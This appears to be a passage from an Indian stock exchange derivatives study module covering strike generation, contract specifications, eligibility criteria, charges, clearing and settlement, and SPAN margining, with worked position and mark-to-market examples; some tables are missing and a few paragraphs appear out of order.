The exchange has a policy for introducing strike prices and determining the strike price intervals. Table 7.3 and Table 7.4 summarise the policy for introducing strike prices and determining the strike price interval for stocks and index respectively. Let us look at an example of how the various option strikes are generated by the exchange. Suppose the exchange commits itself to an inter-strike distance of, say, 100 and a scheme of strikes of 6-1-6.
• Suppose the Nifty options with strikes 4400, 4500, 4600, 4700, 4800, 4900, 5000, 5100, 5200, 5300, 5400, 5500 and 5600 are available.
• It is to be noted that in this example the Nifty index level is between 4001 and 6000.
• If the Nifty closes at around 5051, then to ensure a strike scheme of 6-1-6 one more strike would be required at 5700.
• Conversely, if the Nifty closes at around 4949, then to ensure a strike scheme of 6-1-6 one more strike would be required at 4300.

Table 7.3: Generation of strikes for stock options

Price of underlying | Strike price interval | Scheme of strikes to be introduced (ITM-ATM-OTM)
Less than or equal to Rs. 50 | 2.5 | 5-1-5
> Rs. 50 and <= Rs. 100 | 5 | 5-1-5
> Rs. 100 and <= Rs. 250 | 10 | 5-1-5
> Rs. 250 and <= Rs. 500 | 20 | 5-1-5
> Rs. 500 and <= Rs. 1000 | 20 | 10-1-10
> Rs. 1000 | 50 | 10-1-10

7.3.3 Contract specifications for stock futures
Trading in stock futures commenced on the NSE from November 2001. These contracts are cash settled on a T+1 basis. The expiration cycle for stock futures is the same as for index futures, index options and stock options. A new contract is introduced on the trading day following the expiry of the near month contract. Table 7.5 gives the contract specifications for stock futures.
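The 6-1-6 scheme in the example above can be sketched as a small helper (an illustrative reconstruction, not exchange code; the interval of 100 matches the Nifty example):

```python
def nearest_strike(index_close, interval=100):
    """Round the index close to the nearest strike on the interval grid."""
    return int(round(index_close / interval) * interval)

def generate_strikes(atm_strike, interval=100, each_side=6):
    """Strike ladder for an n-1-n scheme: `each_side` strikes below the
    at-the-money strike, the ATM strike itself, and `each_side` above."""
    return [atm_strike + i * interval for i in range(-each_side, each_side + 1)]

# Nifty closes around 5051 -> ATM strike 5100, ladder runs 4500..5700,
# so a new strike at 5700 is needed beyond the existing 4400..5600 set.
print(generate_strikes(nearest_strike(5051)))
# A close around 4949 -> ATM 4900, ladder 4300..5500, requiring 4300.
print(generate_strikes(nearest_strike(4949)))
```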
Table 7.5: Contract specification of stock futures

Contract size: Minimum value of Rs. 2 lakh
Price steps: Re. 0.05
Price bands: Operating range of 20% of the base price
Trading cycle: The futures contracts will have a maximum of three-month trading cycle - the near month (one), the next month (two) and the far month (three). New contract will be introduced on the next trading day following the expiry of the near month contract.
Expiry day: The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.
Settlement basis: Mark to market and final settlement will be cash settled on T+1 basis.
Settlement price: Daily settlement price will be the closing price of the futures contracts for the trading day, and the final settlement price shall be the closing price of the underlying security on the last trading day.

7.3.4 Contract specifications for stock options
Trading in stock options commenced on the NSE from July 2001. Currently these contracts are European style and are settled in cash. A new contract is introduced on the trading day following the expiry of the near month contract. NSE provides a minimum of eleven strike prices for every option type (i.e. call and put) during the trading month: there are at least five in-the-money contracts, five out-of-the-money contracts and one at-the-money contract available for trading. Table 7.6 gives the contract specifications for stock options.
Table 7.6: Contract specification of stock options

Contract size: Minimum value of Rs. 2 lakh
Price steps: Re. 0.05
Price bands: Not applicable
Trading cycle: The options contracts will have a maximum of three-month trading cycle - the near month (one), the next month (two) and the far month (three). New contract will be introduced on the next trading day following the expiry of the near month contract.
Expiry day: The last Thursday of the expiry month or the previous trading day if the last Thursday is a trading holiday.

The Mini derivative (Futures and Options) contracts on S&P CNX Nifty were introduced for trading on January 1, 2008. The mini contracts have a smaller contract size than the normal Nifty contract; they extend greater affordability to individual investors and help the individual investor to hedge the risks of a smaller portfolio. The Long Term Options Contracts on S&P CNX Nifty were launched on March 3, 2008. The long term options have a life cycle of maximum 5 years duration and offer long term investors the opportunity to take a view on prolonged price changes over a longer duration, without needing to use a combination of shorter term option contracts.
7.4 Criteria for Stocks and Index Eligibility for Trading

7.4.1 Eligibility criteria of stocks
• The stock is chosen from amongst the top 500 stocks in terms of average daily market capitalisation and average daily traded value in the previous six months on a rolling basis.
• The stock's median quarter-sigma order size over the last six months should be not less than Rs. 5 lakhs. For this purpose, a stock's quarter-sigma order size should mean the order size (in value terms) required to cause a change in the stock price equal to one-quarter of a standard deviation.
• The market wide position limit in the stock should not be less than Rs. 100 crores. The market wide position limit of open position (in terms of the number of underlying stock) on futures and option contracts on a particular underlying stock shall be 20% of the number of shares held by non-promoters in the relevant underlying security, i.e. the free-float holding.

The above criteria is applied every month. If an existing security fails to meet the eligibility criteria for three months consecutively, then no fresh month contract will be issued on that security. However, the existing unexpired contracts can be permitted to trade till expiry and new strikes can also be introduced in the existing contract months. Further, once the stock is excluded from the F&O list, it shall not be considered for re-inclusion for a period of one year. For an existing F&O stock, the continued eligibility criteria is that the market wide position limit in the stock shall not be less than Rs. 60 crores and the stock's median quarter-sigma order size over the last six months shall be not less than Rs. 2 lakh. Futures & Options contracts may be introduced on (new) securities which meet the above mentioned eligibility criteria, subject to approval by SEBI.

7.4.2 Eligibility criteria of indices
The exchange may consider introducing derivative contracts on an index if the stocks contributing to 80% weightage of the index are individually eligible for derivative trading. However, if the index fails to meet the eligibility criteria for three months consecutively, then no fresh month contract would be issued on that index. However, the existing unexpired contracts will be permitted to trade till expiry and new strikes can also be introduced in the existing contracts.
7.4.3 Eligibility criteria of stocks for derivatives trading on account of corporate restructuring
The eligibility criteria for stocks for derivatives trading on account of corporate restructuring is as under:

I. The following conditions should be met:
a) the Futures and options contracts on the stock of the original (pre-restructure) company were traded on any exchange prior to its restructuring;
b) the pre-restructured company had a market capitalisation of at least Rs. 1000 crores prior to its restructuring;
c) the post-restructured company would be treated like a new stock and if it is, in the opinion of the exchange, likely to be at least one-third the size of the pre-restructuring company in terms of revenues, or assets, or (where appropriate) analyst valuations; and
d) in the opinion of the exchange, the scheme of restructuring does not suggest that the post-restructured company would have any characteristic (for example, extremely low free float) that would render the company ineligible for derivatives trading.

II. If the above conditions are satisfied, then the exchange takes the following course of action in dealing with the existing derivative contracts on the pre-restructured company and the introduction of fresh contracts on the post-restructured company:
a) In the contract month in which the post-restructured company begins to trade, the Exchange introduces near month, middle month and far month derivative contracts on the stock of the restructured company.
b) In subsequent contract months, the normal rules for entry and exit of stocks in terms of eligibility requirements would apply. If these tests are not met, the exchange shall not permit further derivative contracts on this stock and future month series shall not be introduced.

7.5 Charges
The maximum brokerage chargeable by a trading member in relation to trades effected in the contracts admitted to dealing on the F&O segment of NSE is fixed at 2.5% of the contract value, exclusive of statutory levies.
NSE has been periodically reviewing and reducing the transaction charges being levied by it on its trading members. With effect from October 1st, 2009, the transaction charges for trades executed on the futures segment are as per the table given below:

Total traded value in a month | Transaction charges (Rs. per lakh of traded value)
Up to first Rs. 2500 crores | Rs. 1.90 each side
More than Rs. 2500 crores up to Rs. 7500 crores | Rs. 1.85 each side
More than Rs. 7500 crores up to Rs. 15000 crores | Rs. 1.80 each side
Exceeding Rs. 15000 crores | Rs. 1.75 each side

However, for transactions in the options sub-segment the transaction charges are levied on the premium value at the rate of 0.05% (each side), instead of on the strike price as levied earlier. Further to this, trading members have been advised to charge brokerage from their clients on the Premium price (traded price) rather than the Strike price. The trading members contribute to the Investor Protection Fund of the F&O segment at the rate of Re. 1/- per Rs. 100 crores of the traded value (each side).
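The slab table above can be expressed as a lookup, assuming (as is usual for such schedules) that each rate applies incrementally to the traded value falling within its band; this is an illustrative sketch, not NSE billing code:

```python
# Monthly futures transaction charge, assuming slab rates apply incrementally
# to each band (rates in Rs. per lakh of traded value, one side).
CRORE = 1e7
LAKH = 1e5

SLABS = [                     # (upper bound of band in Rs., rate per lakh)
    (2500 * CRORE, 1.90),
    (7500 * CRORE, 1.85),
    (15000 * CRORE, 1.80),
    (float("inf"), 1.75),
]

def transaction_charge(traded_value):
    """Charge for one side on a month's traded value, band by band."""
    charge, lower = 0.0, 0.0
    for upper, rate in SLABS:
        if traded_value <= lower:
            break
        band = min(traded_value, upper) - lower
        charge += band / LAKH * rate
        lower = upper
    return charge

# 1000 crore traded, entirely in the first band (1,00,000 lakh x Rs. 1.90):
print(round(transaction_charge(1000 * CRORE), 2))   # 190000.0
```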
CHAPTER 8: Clearing and Settlement

National Securities Clearing Corporation Limited (NSCCL) undertakes clearing and settlement of all trades executed on the futures and options (F&O) segment of the NSE. It also acts as legal counterparty to all trades on the F&O segment and guarantees their financial settlement. The Clearing and Settlement process comprises of the following three main activities:
1) Clearing
2) Settlement
3) Risk Management
This chapter gives a detailed account of the clearing mechanism, settlement procedure and risk management systems at the NSE for trading of derivatives contracts.

8.1 Clearing Entities
Clearing and settlement activities in the F&O segment are undertaken by NSCCL with the help of the following entities:

8.1.1 Clearing Members
In the F&O segment, some members, called self clearing members, clear and settle trades executed by them only, either on their own account or on account of their clients. Some others, called trading member-cum-clearing members, clear and settle their own trades as well as trades of other trading members (TMs). Besides, there is a special category of members, called professional clearing members (PCM), who clear and settle trades executed by TMs. The members clearing their own trades and trades of others, and the PCMs, are required to bring in additional security deposits in respect of every TM whose trades they undertake to clear and settle.

8.1.2 Clearing Banks
Funds settlement takes place through clearing banks. For the purpose of settlement, all clearing members are required to open a separate bank account with an NSCCL designated clearing bank for the F&O segment.

8.2 Clearing Mechanism
The clearing mechanism essentially involves working out the open positions and obligations of clearing (self-clearing/trading-cum-clearing/professional clearing) members. This position is considered for exposure and daily margin purposes. The open positions of CMs are arrived at by aggregating the open positions of all the TMs and all custodial participants clearing through him, in the contracts in which they have traded. A TM's open position is arrived at as the summation of his proprietary open position and clients' open positions, in the contracts in which he has traded.
While entering orders on the trading system, TMs are required to identify the orders as proprietary (if they are their own trades) or client (if entered on behalf of clients) through the 'Pro/Cli' indicator provided in the order entry screen. Proprietary positions are calculated on a net basis (buy - sell) for each contract, while clients' positions are arrived at by summing together the net (buy - sell) positions of each individual client. A TM's open position is the sum of his proprietary open position, client open long position and client open short position (as shown in the example below).

Consider the following example, given in Table 8.1 to Table 8.4. Note: A buy position '200@1000' means 200 units bought at the rate of Rs. 1000. We assume here that the position on day 1 is carried forward to the next trading day, i.e. Day 2.

Table 8.1: Proprietary position of trading member Madanbhai on Day 1
Trading member Madanbhai trades in the futures and options segment for himself and two of his clients. The table shows his proprietary position.

Proprietary position: Buy 200@1000; Sell 400@1010

The proprietary open position on day 1 is simply Buy - Sell = 200 - 400 = 200 short, i.e. he has a short position of 200 units.

Table 8.2: Client position of trading member Madanbhai on Day 1
The table shows his client position.

Client A: Buy (Open) 400@1109; Sell (Close) 200@1000
Client B: Sell (Open) 600@1100; Buy (Close) 200@1099

The open position for Client A = Buy (O) - Sell (C) = 400 - 200 = 200 long, i.e. he has a long position of 200 units. The open position for Client B = Sell (O) - Buy (C) = 600 - 200 = 400 short, i.e. he has a short position of 400 units. The total open position of the trading member Madanbhai at the end of day 1 is therefore 800, where 200 is his proprietary open position on a net basis plus 600 which is the client open positions on a gross basis.

Table 8.3: Proprietary position of trading member Madanbhai on Day 2
The position on Day 1 is carried forward to Day 2 and the following trades are also executed.

Proprietary position: Buy 200@1000; Sell 400@1010

On Day 2, the proprietary position of the trading member for trades executed on that day is 200 (buy) - 400 (sell) = 200 short. The proprietary open position at the end of day 1 was 200 short; hence the net open proprietary position at the end of day 2 is 400 short.

Table 8.4: Client position of trading member Madanbhai on Day 2
The table shows his client position on Day 2: Client A buys 400 (open) and sells 200 (close), while Client B sells 600 (open) and buys 400 (close).

The end of day open position for trades done by Client A on day 2 is Buy (O) - Sell (C) = 400 - 200 = 200 long; hence the net open position for Client A at the end of day 2 is 400 long. The open position for trades done by Client B on day 2 is Sell (O) - Buy (C) = 600 - 400 = 200 short; hence the net open position for Client B at the end of day 2 is 600 short. Therefore the net open position for the trading member at the end of day 2 is the sum of the proprietary open position and the client open positions. It works out to be 400 + 400 + 600, i.e. 1400.
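The position arithmetic in Tables 8.1 to 8.4 can be reproduced with a short sketch (illustrative only): proprietary trades net against each other, while each client's net position enters the TM's total on a gross basis.

```python
# Open positions per the clearing mechanism: proprietary on net basis,
# clients on gross basis (each client's |net| is added to the total).
def tm_open_position(pro_trades, client_trades):
    """pro_trades: signed quantities (+buy, -sell) of proprietary trades.
    client_trades: dict mapping client id -> list of signed quantities."""
    pro_net = sum(pro_trades)
    client_net = {c: sum(qs) for c, qs in client_trades.items()}
    total = abs(pro_net) + sum(abs(n) for n in client_net.values())
    return pro_net, client_net, total

# Day 1 (Tables 8.1 and 8.2): proprietary buy 200 / sell 400;
# Client A buys 400 and sells 200; Client B sells 600 and buys 200.
pro, clients, total = tm_open_position(
    [200, -400], {"A": [400, -200], "B": [-600, 200]})
print(pro, clients, total)   # -200 {'A': 200, 'B': -400} 800

# Day 2 carries Day 1 forward and adds the day's trades (Tables 8.3, 8.4):
_, _, total2 = tm_open_position(
    [200, -400] * 2, {"A": [400, -200] * 2, "B": [-600, 200, -600, 400]})
print(total2)                # 1400
```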
8.3 Settlement Procedure
All futures and options contracts are cash settled, i.e. settled through the exchange of cash. The underlying for index futures/options, the Nifty index, cannot be delivered; these contracts, therefore, have to be settled in cash. Futures and options on individual securities can be delivered as in the spot market; however, it has been currently mandated that stock options and futures would also be cash settled. The settlement amount for a CM is netted across all their TMs/clients, with respect to their obligations on MTM, premium and exercise settlement.

8.3.1 Settlement of Futures Contracts
Futures contracts have two types of settlements: the Mark-to-Market (MTM) settlement, which happens on a continuous basis at the end of each day, and the final settlement, which happens on the last trading day of the futures contract.

MTM settlement: All futures contracts for each member are marked-to-market (MTM) to the daily settlement price of the relevant futures contract at the end of each day. The profits/losses are computed as the difference between:
1. The trade price and the day's settlement price for contracts executed during the day but not squared up.
2. The previous day's settlement price and the current day's settlement price for brought forward contracts.
3. The buy price and the sell price for contracts executed during the day and squared up.

Table 8.6 explains the MTM calculation for a member on various positions. The settlement price for the contract for today is assumed to be Rs. 105. The MTM on the brought forward contract is the difference between the previous day's settlement price of Rs. 100 and today's settlement price of Rs. 105; hence, on account of the position brought forward, the MTM shows a profit of Rs. 500. For contracts executed during the day, the difference between the buy price and the sell price determines the MTM. In this example, 200 units are bought @ Rs. 100 and 100 units sold @ Rs. 102 during the day, so the squared-up portion shows a profit of Rs. 200. Finally, the open position of contracts traded during the day is margined at the day's settlement price and the profit of Rs. 500 credited to the MTM account. So the MTM account shows a total profit of Rs. 1200.

The CMs who have a loss are required to pay the mark-to-market (MTM) loss amount in cash, which is in turn passed on to the CMs who have made an MTM profit. This is known as daily mark-to-market settlement. After completion of the daily settlement computation, all the open positions are reset to the daily settlement price; such positions become the open positions for the next day. The pay-in and pay-out of the mark-to-market settlement are effected on the day following the trade day.

In case a futures contract is not traded on a day, or not traded during the last half hour, a 'theoretical settlement price' is computed as per the following formula: F = Se^(rT). This formula has been discussed in Chapter 3.

Final settlement for futures: On the expiry day of the futures contracts, after the close of trading hours, NSCCL marks all positions of a CM to the final settlement price and the resulting profit/loss is settled in cash. The final settlement price is the closing price of the relevant underlying index/security in the capital market segment of NSE. The final settlement loss/profit amount is debited/credited to the relevant CM's clearing bank account on the day following the expiry day of the contract.

8.3.2 Settlement of options contracts
Options contracts have two types of settlement: daily premium settlement and final exercise settlement.

Daily premium settlement: The buyer of an option is obligated to pay the premium towards the options purchased by him, while the seller of an option is entitled to receive the premium for the option sold by him. The premium payable amount and the premium receivable amount are netted to compute the net premium payable or receivable amount for each client for each option contract.
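The futures MTM example above (Rs. 500 + Rs. 200 + Rs. 500 = Rs. 1,200) can be checked with a short sketch. The brought-forward quantity of 100 units is implied by the Rs. 500 profit on a 5-point move; the rest follows the three components listed for MTM settlement.

```python
# Mark-to-market settlement components for one member (cf. Table 8.6).
def mtm(brought_fwd_qty, prev_settle, day_buys, day_sells, settle_today):
    """day_buys/day_sells: lists of (qty, price). A long brought-forward
    position is assumed; the day's squared-up quantity is matched at average
    traded prices and the residual is marked to the day's settlement price."""
    # 1. Brought-forward contracts: previous vs today's settlement price.
    pnl = brought_fwd_qty * (settle_today - prev_settle)
    bought = sum(q for q, _ in day_buys)
    sold = sum(q for q, _ in day_sells)
    avg_buy = sum(q * p for q, p in day_buys) / bought if bought else 0.0
    avg_sell = sum(q * p for q, p in day_sells) / sold if sold else 0.0
    squared = min(bought, sold)
    # 2. Squared-up trades: sell price vs buy price.
    pnl += squared * (avg_sell - avg_buy)
    # 3. Residual open position from the day, marked to today's settlement.
    pnl += (bought - squared) * (settle_today - avg_buy)
    pnl -= (sold - squared) * (settle_today - avg_sell)
    return pnl

# 100 brought forward at settlement 100; buy 200 @ 100, sell 100 @ 102;
# today's settlement 105: 500 + 200 + 500 = 1200 profit.
print(mtm(100, 100, [(200, 100)], [(100, 102)], 105))   # 1200.0
```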
For the daily MTM settlement of futures described above, TMs are responsible to collect/pay losses/profits from/to their clients by the next day, while CMs are responsible to collect and settle the daily MTM profits/losses incurred by the TMs and their clients clearing and settling through them.

Exercise process: The period during which an option is exercisable depends on the style of the option. On NSE, index options and options on securities are European style, i.e. options are only subject to automatic exercise on the expiration day. Automatic exercise means that all in-the-money options would be exercised by NSCCL on the expiration day of the contract. The buyer of such options need not give an exercise notice in such cases.

Final exercise settlement: Final exercise settlement is effected for all open long in-the-money strike price options existing at the close of trading hours on the expiration day of an option contract. All such long positions are exercised and automatically assigned to short positions in option contracts with the same series, on a random basis. The investor who has long in-the-money options on the expiry date will receive the exercise settlement value per unit of the option from the investor who is short on the option. Settlement of exercises of options is currently by payment in cash and not by delivery of securities.

Exercise settlement computation: The exercise settlement price is the closing price of the underlying (index or security) on the expiry day of the relevant option contract. For call options, the exercise settlement value receivable by a buyer is the difference between the final settlement price and the strike price for each unit of the underlying conveyed by the option contract, while for put options it is the difference between the strike price and the final settlement price for each unit of the underlying conveyed by the option contract. The exercise settlement value is debited/credited to the relevant CM's clearing bank account on T+1 day (T = exercise date).

Special facility for settlement of institutional deals: NSCCL provides a special facility to Institutions/Foreign Institutional Investors (FIIs)/Mutual Funds etc. to execute trades through any TM, which may be cleared and settled by their own CM. Such entities are called custodial participants (CPs). To avail of this facility, a CP is required
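The exercise settlement computation described above amounts to the in-the-money amount per unit, times the number of units; out-of-the-money options simply lapse. A minimal sketch (the final settlement price of 5150 is a made-up figure for illustration):

```python
# Exercise settlement value for cash-settled European options (cf. 8.3.2).
def exercise_settlement_value(option_type, strike, final_settle, units=1):
    """Call: final settlement price minus strike; Put: strike minus final
    settlement price; floored at zero since only ITM options are exercised."""
    if option_type == "CE":          # call European
        per_unit = max(final_settle - strike, 0.0)
    elif option_type == "PE":        # put European
        per_unit = max(strike - final_settle, 0.0)
    else:
        raise ValueError("option_type must be 'CE' or 'PE'")
    return per_unit * units

# A 5000-strike Nifty call, hypothetical final settlement 5150, lot of 50:
print(exercise_settlement_value("CE", 5000, 5150, 50))   # 7500.0
# The same strike put is out-of-the-money and lapses:
print(exercise_settlement_value("PE", 5000, 5150, 50))   # 0.0
```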
8.4 Risk Management
NSCCL has developed a comprehensive risk containment mechanism for the F&O segment. Risk containment measures include capital adequacy requirements of members, monitoring of member performance and track record, stringent margin requirements, position limits based on capital, online monitoring of member positions and automatic disablement from trading when limits are breached, and compliance with the prescribed procedure for settlement and reporting. The salient features of the risk containment mechanism on the F&O segment are:
1. There are stringent requirements for members in terms of capital adequacy, measured in terms of net worth and security deposits.
2. NSCCL charges an upfront initial margin for all the open positions of a CM. It specifies the initial margin requirements for each futures/options contract on a daily basis. The CM in turn collects the initial margin from the TMs and their respective clients.
3. Client margins: NSCCL intimates all members of the margin liability of each of their clients. Additionally, members are also required to report details of margins collected from clients to NSCCL, which holds in trust client margin monies to the extent reported by the member as having been collected from their respective clients.
4. The open positions of the members are marked to market based on the contract settlement price for each contract. The difference is settled in cash on a T+1 basis.
5. NSCCL's on-line position monitoring system monitors a CM's open positions on a real-time basis. Limits are set for each CM based on his capital deposits, and the on-line position monitoring system generates alerts whenever a CM reaches a position limit set up by NSCCL. At 100%, the clearing facility provided to the CM shall be withdrawn. Withdrawal of the clearing facility of a CM in case of a violation will lead to withdrawal of the trading facility for all TMs and/or custodial participants clearing and settling through the CM.

To avail of the special facility for institutional deals, a CP is required to register with NSCCL through his CM. A unique CP code is allotted to the CP by NSCCL. All trades executed by a CP through any TM are required to have the CP code in the relevant field on the trading system at the time of order entry. Such trades executed on behalf of a CP are confirmed by their own CM (and not the CM of the TM through whom the order is entered), within the time specified by NSE on the trade day, through the on-line confirmation facility. Till such time the trade is confirmed by the CM of the concerned CP, the same is considered as a trade of the TM and the responsibility of settlement of such trade vests with the CM of the TM. Once confirmed by the CM of the concerned CP, such CM is responsible for the clearing and settlement of deals of such custodial clients.

A FII, or a sub-account of the FII, as the case may be, intending to trade in the F&O segment of the exchange, is required to obtain a unique Custodial Participant (CP) code allotted from the NSCCL. FII/sub-accounts of FIIs which have been allotted a unique CP code by NSCCL are only permitted to trade on the F&O segment. FIIs have been permitted to trade subject to compliance with the position limits prescribed for them and their sub-accounts.
A separate settlement guarantee fund for this segment has been created out of the capital of members. A CM is required to ensure collection of adequate initial margin from his TMs and their respective clients, and the TM is required to collect adequate initial margins up-front from his clients. CMs are provided a trading terminal for the purpose of monitoring the open positions of all the TMs clearing and settling through them. A CM may set exposure limits for a TM clearing and settling through him; when such a limit is breached, the system stops that particular TM from further trading. Further, trading members are monitored based on position limits: the trading facility is withdrawn when the open positions of the trading member exceed the position limit. A member is alerted of his position to enable him to adjust his exposure or bring in additional capital.

The most critical component of the risk containment mechanism for the F&O segment is the margining system and on-line position monitoring. The actual position monitoring and margining is carried out on-line through the Parallel Risk Management System (PRISM). NSCCL collects initial margin for all the open positions of a CM based on the margins computed by NSE-SPAN. These margins are required to be paid up-front, on a gross basis at individual client level for client positions and on a net basis for proprietary positions.

• Premium margin: In addition to initial margin, premium margin is charged at client level. This margin is required to be paid by a buyer of an option till the premium settlement is complete.

8.4.1 NSCCL-SPAN
The objective of NSCCL-SPAN is to identify the overall risk in a portfolio of all futures and options contracts for each member, based on the parameters defined by SEBI, while at the same time recognizing the unique exposures associated with options portfolios, like extremely deep out-of-the-money short positions and inter-month risk.
• Assignment margin: Assignment margin is levied in addition to initial margin and premium margin. It is required to be paid on assigned positions of CMs towards exercise settlement obligations for option contracts. The margin is charged on the net exercise settlement value payable by a CM, till such obligations are fulfilled.
8.5 Margining System
NSCCL has developed a comprehensive risk containment mechanism for the Futures & Options segment. The most critical component of a risk containment mechanism is the online position monitoring and margining system. The actual margining and position monitoring is done online, on an intra-day basis, using PRISM (Parallel Risk Management System), which is the real-time position monitoring and risk management system. The risk of each trading and clearing member is monitored on a real-time basis and alerts/disablement messages are generated if the member crosses the set limits.
8.5.1 SPAN approach of computing initial margins
The objective of SPAN is to identify overall risk in a portfolio of futures and options contracts for each member. The system treats futures and options contracts uniformly, while at the same time recognizing the unique exposures associated with options portfolios, like extremely deep out-of-the-money short positions. Because SPAN is used to determine performance bond requirements (margin requirements), its overriding objective is to determine the largest loss that a portfolio might reasonably be expected to suffer from one day to the next day. It then sets the margin requirement at a level sufficient to cover this one-day loss.
In standard pricing models, three factors most directly affect the value of an option at a given point in time:
1. Underlying market price
2. Volatility (variability) of underlying instrument
3. Time to expiration
As these factors change, so too will the value of futures and options maintained within a portfolio. SPAN constructs sixteen scenarios of probable changes in underlying prices and volatilities in order to identify the largest loss a portfolio might suffer from one day to the next.
The computation of worst scenario loss has two components. The first is the valuation of each contract under sixteen scenarios. The second is the application of these scenario contract values to the actual positions in a portfolio to compute the portfolio values and the worst scenario loss. The scenario contract values are updated at least 5 times in the day, which may be carried out by taking prices at the start of trading, at 11:00 a.m., at 12:30 p.m., at 2:00 p.m., and at the end of the trading session.
8.5.2 Mechanics of SPAN
The results of complex calculations (e.g. the pricing of options) in SPAN are called risk arrays. Risk arrays, and other necessary data inputs for margin calculation, are provided to members on a daily basis in a file called the SPAN Risk Parameter file. Members can apply the data contained in the risk parameter files to their specific portfolios of futures and options contracts, to determine their SPAN margin requirements. SPAN has the ability to estimate risk for combined futures and options portfolios, and re-value the same under various scenarios of changing market conditions.
Risk arrays
The SPAN risk array represents how a specific derivative instrument (for example, an option on the NIFTY index at a specific strike price) will gain or lose value, from the current point in time to a specific point in time in the near future, for a specific set of market conditions which may occur over this time duration. The result of the calculation for each risk scenario, i.e. the amount by which the futures and options contracts will gain or lose value over the look-ahead time under that risk scenario, is called the risk array value for that scenario. The set of risk array values for each futures and options contract under the full set of risk scenarios constitutes the risk array for that contract. In the risk array, losses are represented as positive values and gains as negative values. Risk array values are represented in Indian Rupees, the currency in which the futures or options contract is denominated.
Risk scenarios
The specific set of market conditions evaluated by SPAN are called the risk scenarios, and these are defined in terms of:
1. How much the price of the underlying instrument is expected to change over one trading day, and
2. How much the volatility of that underlying price is expected to change over one trading day.
SPAN further uses a standardized definition of the risk scenarios, defined in terms of:
1. The underlying price scan range or probable price change over a one day period, and
2. The underlying price volatility scan range or probable volatility change of the underlying over a one day period.
Table 8.7 gives the sixteen risk scenarios. +1 refers to increase in volatility and -1 refers to decrease in volatility.
The volatility estimate at the end of day t, σt, is computed using the previous day's volatility estimate σt-1 (as at the end of day t-1) and the return rt observed in the futures market on day t, through the exponentially weighted moving average:
σt² = λσt-1² + (1 - λ)rt²
where λ is a parameter which determines how rapidly volatility estimates change. A value of 0.94 is used for λ.
SPAN uses the risk arrays to scan probable underlying market price changes and probable volatility changes for all contracts in a portfolio, in order to determine value gains and losses at the portfolio level. This is the single most important calculation executed by the system.
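The EWMA update above can be sketched in a few lines of Python. This is a minimal illustration of the formula only; the function name and sample figures are my own, not part of any NSE specification.

```python
import math

LAMBDA = 0.94  # smoothing parameter used for the daily volatility estimate

def ewma_volatility(sigma_prev: float, r_t: float, lam: float = LAMBDA) -> float:
    """Update the volatility estimate: sigma_t^2 = lam*sigma_{t-1}^2 + (1-lam)*r_t^2."""
    return math.sqrt(lam * sigma_prev**2 + (1 - lam) * r_t**2)

# Example: yesterday's volatility estimate 1.5%, today's futures return -2%
sigma_t = ewma_volatility(0.015, -0.02)
print(round(sigma_t, 6))
```

A higher λ makes the estimate respond more slowly to new information; with λ = 0.94, only 6% of the weight goes to the latest squared return.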
Scanning risk charge
As shown in the table giving the sixteen standard risk scenarios, for each futures and options contract SPAN starts at the last underlying market settlement price and scans up and down three even intervals of price changes (price scan range). At each price scan point, the program also scans up and down a range of probable volatility from the underlying market's current volatility (volatility scan range). SPAN calculates the probable premium value at each price scan point for the volatility up and volatility down scenarios. It then compares this probable premium value to the theoretical premium value (based on the last closing value of the underlying) to determine profit or loss.
Deep-out-of-the-money short options positions pose a special risk identification problem. As they move towards expiration, they may not be significantly exposed to "normal" price moves in the underlying. However, unusually large underlying price changes may cause these options to move into-the-money, thus creating large losses to the holders of short option positions. In order to account for this possibility, two of the standard risk scenarios in the risk array, Number 15 and 16, reflect an "extreme" underlying price movement, currently defined as double the maximum price scan range for a given underlying. However, because price changes of these magnitudes are rare, the system only covers 35% of the resulting losses.
After SPAN has scanned the 16 different scenarios of underlying market price and volatility changes, it selects the largest loss from among these 16 observations. This "largest reasonable loss" is the scanning risk charge for the portfolio.
Calendar spread margin
A calendar spread is a position in an underlying with one maturity which is hedged by an offsetting position in the same underlying with a different maturity: for example, a short position in a July futures contract on Reliance and a long position in the August futures contract on Reliance is a calendar spread. Calendar spreads attract lower margins because they are not exposed to market risk of the underlying. If the underlying rises, the July contract would make a loss while the August contract would make a profit.
As SPAN scans futures prices within a single underlying instrument, it assumes that price moves correlate perfectly across contract months. Since price moves across contract months do not generally exhibit perfect correlation, SPAN adds a calendar spread charge (also called the inter-month spread charge) to the scanning risk charge associated with each futures and options contract. To put it in a different way, the calendar spread charge covers the calendar basis risk that may exist for portfolios containing futures and options with different expirations.
For each futures and options contract, SPAN identifies the delta associated with each futures and option position for a contract month. It then forms spreads using these deltas across contract months. For each spread formed, SPAN assesses a specific charge per spread which constitutes the calendar spread charge.
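Under the risk-array sign convention (losses positive, gains negative), the scenario selection can be sketched as follows. The function name and sample numbers are illustrative only and assume scenarios 15 and 16 are the extreme-move scenarios of which 35% is covered:

```python
def scanning_risk_charge(scenario_losses):
    """Pick the scanning risk charge from the 16 risk-scenario results.

    scenario_losses: 16 values, losses positive and gains negative.
    The last two entries are the 'extreme' price-move scenarios,
    of which only 35% of the loss is covered.
    """
    assert len(scenario_losses) == 16
    covered = list(scenario_losses[:14]) + [0.35 * x for x in scenario_losses[14:]]
    return max(covered)  # the "largest reasonable loss"

# Worst ordinary scenario loses 12,000; extreme scenarios lose 40,000 and
# 38,000, but only 35% of those is covered (14,000 and 13,300).
losses = [3000, -2000, 12000, 5000, 0, -1000, 8000, 2500,
          4000, -500, 9000, 1000, 7000, 6000, 40000, 38000]
print(scanning_risk_charge(losses))  # 14000.0
```

Here the covered extreme loss (14,000) exceeds the worst ordinary scenario (12,000), so it sets the charge.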
The margin for calendar spread is calculated on the basis of the delta of the portfolio in each month. A calendar spread position on exchange traded equity derivatives may be granted calendar spread treatment till the expiry of the near month contract. Margin on calendar spreads is levied at 0.5% per month of spread on the far month contract of the spread, subject to a minimum margin of 1% and a maximum margin of 3% on the far month contract of the spread.
Short option minimum margin
Short options positions in extremely deep-out-of-the-money strikes may appear to have little or no risk across the entire scanning range. However, in the event that underlying market conditions change sufficiently, these options may move into-the-money, thereby generating large losses for the short positions in these options. To cover the risks associated with deep-out-of-the-money short options positions, SPAN assesses a minimum margin for each short option position in the portfolio, called the short option minimum charge, which is set by the NSCCL. The short option minimum charge serves as a minimum charge towards margin requirements for each short position in an option contract.
For example, suppose that the short option minimum charge is Rs. 50 per short position. A portfolio containing 20 short options will have a margin requirement of at least Rs. 1,000, even if the scanning risk charge plus the calendar spread charge on the position is only Rs. 500.
